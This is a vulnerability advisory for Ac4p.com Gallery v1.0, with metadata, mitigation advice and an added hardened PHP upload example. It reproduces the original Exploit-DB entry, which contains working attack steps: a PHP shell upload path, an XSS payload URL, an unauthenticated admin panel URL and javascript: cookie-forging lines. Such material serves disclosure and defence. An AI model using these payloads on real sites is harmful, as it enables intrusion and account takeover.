Vendor: Ac4p.com Gallery
By: indoushka
CVSS: 8.8 (HIGH)
Vulnerability types: Upload Vulnerability, Php info, XSS, By Pass, Insecure Cookie Handling Vulnerability
CWE: 434, 79, 352, 285, 613
Product Name: Ac4p.com Gallery
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: No
Related CWE: N/A
CPE: a:ac4p:ac4p.com_gallery:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2007

Ac4p.com Gallery v1.0 Multiple Vulnerabilities

Ac4p.com Gallery v1.0 contains several weaknesses that allow an attacker to upload arbitrary files (including PHP scripts) through the gallery upload page, read the server's PHP configuration from an exposed phpinfo page, execute cross-site scripting payloads reflected through the index page, reach the control panel without authenticating, and forge the authentication state because it is kept in client-controlled cookies.

Mitigation:

Restrict uploads to an allow-list of file extensions, enforce a maximum file size, and verify the MIME type of the uploaded content rather than trusting the client-supplied name or type. Sanitize and validate all user-supplied input before it is reflected or processed. Authenticate users on every protected page, and keep authentication state in a server-side session rather than in cookies the client can set.
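To make the upload and authentication controls above concrete, here is an added example of a hardened PHP upload handler; it is not code from the advisory or from Ac4p.com Gallery, and the function name `validate_and_store()` and the session variable `$_SESSION['user_id']` are assumptions made for the illustration.

```php
<?php
// Added example, not code from the advisory or from Ac4p.com Gallery.
// validate_and_store() and $_SESSION['user_id'] are assumed names.
declare(strict_types=1);

// Allow-list keyed by the MIME type detected from the file's bytes.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
const MAX_BYTES = 2 * 1024 * 1024; // 2 MiB upper bound on upload size

function validate_and_store(array $file, string $upload_dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Decide the type from content, not from the client-supplied name or
    // Content-Type: a name such as 1266607903.jpg.php must never decide
    // how the server later handles the file.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported file type');
    }
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name with exactly one allow-listed extension; no part
    // of the user's filename reaches the filesystem path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Gate the upload on a server-side session. A client-settable cookie such as
// "ok=tmam" proves nothing, because the browser controls its value.
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('login required');
}
// Serve the upload directory with script execution disabled (for example
// php_admin_flag engine off under Apache mod_php) as defence in depth.
echo validate_and_store($_FILES['image'] ?? [], __DIR__ . '/userup');
```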

Exploit-DB raw data:

========================================================================================
| # Title    : Ac4p.com Gallery v1.0 Multi Vulnerability
| # Author   : indoushka
| # email    : indoushka@hotmail.com
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : www.iq-ty.com
| # Dork     : Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug      : Multi
======================      Exploit By indoushka       =================================
# Exploit  :

 1 - Upload Vulnerability:

 I-  http://server/gallery/up.php (To upload Evil )

 II- http://server/gallery/userup/1266607903.jpg.php (To Find Evil)

 2 - Php info:

 http://server/gallery/phpinfo.php

 3 - XSS:

 http://server/gallery/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

 4 - By Pass:

 http://server/gallery/cp/menu.php

 5 - Insecure Cookie Handling Vulnerability:

 I-   javascript:document.cookie="user_id=userid;path=/";
 II-  javascript:document.cookie="password=password;path=/";
 III- javascript:document.cookie="username=username;path=/";
 IV-  javascript:document.cookie="ok=tmam;path=/";

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)* www.arhack.net
www.securityreason.com * www.packetstormsecurity.org * Cyb3r IntRue (avengers team)* www.sec-war.com
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net * www.alkrsan.net
--------------------------------------------------------------------------------------------------------------